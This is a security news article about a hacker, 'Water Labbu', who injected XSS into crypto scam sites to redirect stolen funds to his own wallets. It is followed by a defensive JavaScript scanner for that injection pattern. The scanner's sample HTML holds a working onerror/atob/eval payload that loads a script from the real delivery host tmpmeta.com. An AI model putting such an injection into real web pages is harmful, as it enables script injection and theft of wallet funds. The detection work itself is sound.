Security researchers have identified a hacker who broke into cryptocurrency scam websites and redirected funds the scammers had already stolen into his own wallets, a scheme that has already netted him hundreds of thousands of dollars.
According to Trend Micro, a threat actor tracked as “Water Labbu” located and compromised 45 scam websites and replaced the wallet addresses used by those sites with his own. Whatever money the con artists trick people into sending them is therefore delivered to him instead.
Most of the sites are bogus liquidity mining pools. A legitimate liquidity mining pool asks its users to lend their digital assets to a decentralized exchange, which pools them to provide liquidity. That liquidity lets traders swap tokens directly on the exchange (decentralized, as opposed to a centralized model where a single entity supplies the liquidity), and the lenders earn a share of the trading fees in return.
Users must connect their wallets to the liquidity mining pool before they can lend out their holdings. A fake site does nothing more than wait for a user to connect a wallet and then drain it completely. Running such a scam takes considerable effort, including building bogus apps and promoting the fraud on social media. Water Labbu sidesteps all of that and lets the original con artists do the laborious work on his behalf.
“In one of the examples we investigated, Water Labbu manipulated an IMG element to load a Base64-encoded JavaScript payload via the ‘error’ event,” Trend Micro’s study noted.
This is an XSS evasion technique used to bypass Cross-Site Scripting (XSS) filters. The injected payload then creates another script element, which loads a further script from the delivery server at tmpmeta.com.
The script looks for newly connected wallets holding at least 0.005 ETH or 22,000 USDT and then, depending on the platform (Windows or one of two mobile platforms), either performs the transfer or resumes the search.
Trend Micro reminds users that, to protect themselves from this type of fraud, they should be very careful when connecting their wallets and should do their research before handing over any of their tokens.
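The injection chain described above (an IMG element whose error handler runs a Base64-encoded payload, which in turn appends a script element pointing at the delivery host) is easy to spot with a static check over captured page HTML. The following scanner is an added example written for this article; it is not Trend Micro's tooling or anything recovered from the compromised sites. It assumes only that the handler uses `atob()` to decode the payload, and the only indicator it carries from the report is the delivery domain tmpmeta.com; the sample HTML and its second-stage loader are constructed for the demonstration.

```javascript
// Added example (not from Trend Micro or the article): a small static
// scanner for the injection shape the report describes, an <img> whose
// error handler decodes and runs a Base64 payload that loads a further
// script from a delivery host. Runs offline on captured HTML, no DOM.

// Delivery hosts to flag. tmpmeta.com is the domain named in the report.
const SUSPICIOUS_HOSTS = ["tmpmeta.com"];

// Every <img ...> tag that carries an onerror attribute (quoted value).
const IMG_ONERROR_RE = /<img\b[^>]*\bonerror\s*=\s*(['"])([\s\S]*?)\1[^>]*>/gi;
// atob('...') / atob("...") calls inside that handler.
const ATOB_RE = /atob\(\s*(['"])([A-Za-z0-9+\/=]+)\1\s*\)/g;
// URLs inside the decoded payload; group 1 is the host.
const URL_HOST_RE = /https?:\/\/([^\/'"\s]+)/g;

function decodeBase64(s) {
  // Buffer ignores characters outside the alphabet, so this never throws.
  return Buffer.from(s, "base64").toString("utf8");
}

// Returns one finding per <img onerror> handler found in the HTML.
function scanHtml(html) {
  const findings = [];
  for (const m of html.matchAll(IMG_ONERROR_RE)) {
    const handler = m[2];
    const finding = {
      tag: m[0],
      decodedPayloads: [],
      createsScriptElement: false, // second stage appends a <script>
      externalHosts: [],
      knownBadHost: false,
    };
    for (const a of handler.matchAll(ATOB_RE)) {
      const decoded = decodeBase64(a[2]);
      finding.decodedPayloads.push(decoded);
      if (/createElement\(\s*['"]script['"]\s*\)/.test(decoded)) {
        finding.createsScriptElement = true;
      }
      for (const u of decoded.matchAll(URL_HOST_RE)) {
        finding.externalHosts.push(u[1].toLowerCase());
      }
    }
    finding.knownBadHost = finding.externalHosts.some((h) =>
      SUSPICIOUS_HOSTS.some((bad) => h === bad || h.endsWith("." + bad))
    );
    findings.push(finding);
  }
  return findings;
}

// Constructed sample page: one benign image plus one injected element
// shaped like the report's description. STAGE2 is a placeholder loader,
// not code taken from any real site.
const STAGE2 =
  'var s=document.createElement("script");' +
  's.src="https://tmpmeta.com/loader.js";document.head.appendChild(s);';
const STAGE2_B64 = Buffer.from(STAGE2).toString("base64");
const SAMPLE_HTML = `
<html><body>
<img src="/logo.png" alt="logo">
<img src="x" onerror="eval(atob('${STAGE2_B64}'))">
</body></html>`;

for (const f of scanHtml(SAMPLE_HTML)) {
  console.log(
    `flagged: createsScript=${f.createsScriptElement} ` +
      `hosts=${f.externalHosts.join(",")} knownBad=${f.knownBadHost}`
  );
}
```

The check is deliberately narrow: it only decodes what an `atob()` call carries and only looks for the two behaviours the report names, a created script element and an external host. A site owner reviewing a page dump can extend `SUSPICIOUS_HOSTS` with their own indicators, and any `onerror` handler on an image that decodes and evaluates data is worth a manual look even when no listed host appears.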